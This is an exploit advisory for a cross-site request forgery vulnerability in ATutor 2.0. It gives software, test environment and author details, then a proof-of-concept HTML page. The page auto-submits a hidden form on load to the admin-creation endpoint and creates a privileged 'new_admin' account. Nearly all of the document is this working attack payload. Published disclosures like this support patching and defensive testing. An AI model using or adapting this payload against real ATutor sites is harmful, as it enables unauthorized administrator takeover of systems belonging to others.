ATutor version 2.0 cross site request forgery exploit that adds a new administrator.
2313749fea1adb80f1f9d0955b5ecadd5b3fe85763703e5cd74f7c0c744b3f89
<!------------------------------------------------------------------------
# Software................ATutor 2.0
# Vulnerability...........Cross-site Request Forgery
# Download................http://www.atutor.ca/atutor/
# Release Date............7/5/2010
# Tested On...............Windows Vista + XAMPP
# ------------------------------------------------------------------------
# Author..................John Leitch
# Site....................http://cross-site-scripting.blogspot.com/
# Email...................john.leitch5@gmail.com
# ------------------------------------------------------------------------
#
# --Description--
#
# A cross-site request forgery vulnerability in ATutor 2.0 can be
# exploited to create a new admin (new_admin/Password1).
#
#
# --PoC-->
<html>
<body onload="document.forms[0].submit.click()">
<form method="POST" action="http://localhost/atutor/mods/_core/users/admins/create.php">
<input type="hidden" name="form_password_hidden" value="70ccd9007338d6d81dd3b6271621b9cf9a97ea00" />
<input type="hidden" name="password_error" value="" />
<input type="hidden" name="login" value="new_admin" />
<input type="hidden" name="password" value="" />
<input type="hidden" name="confirm_password" value="" />
<input type="hidden" name="real_name" value="" />
<input type="hidden" name="email" value="x@x.com" />
<input type="hidden" name="priv_admin" value="1" />
<input type="submit" name="submit" value="Save" />
</form>
</body>
</html>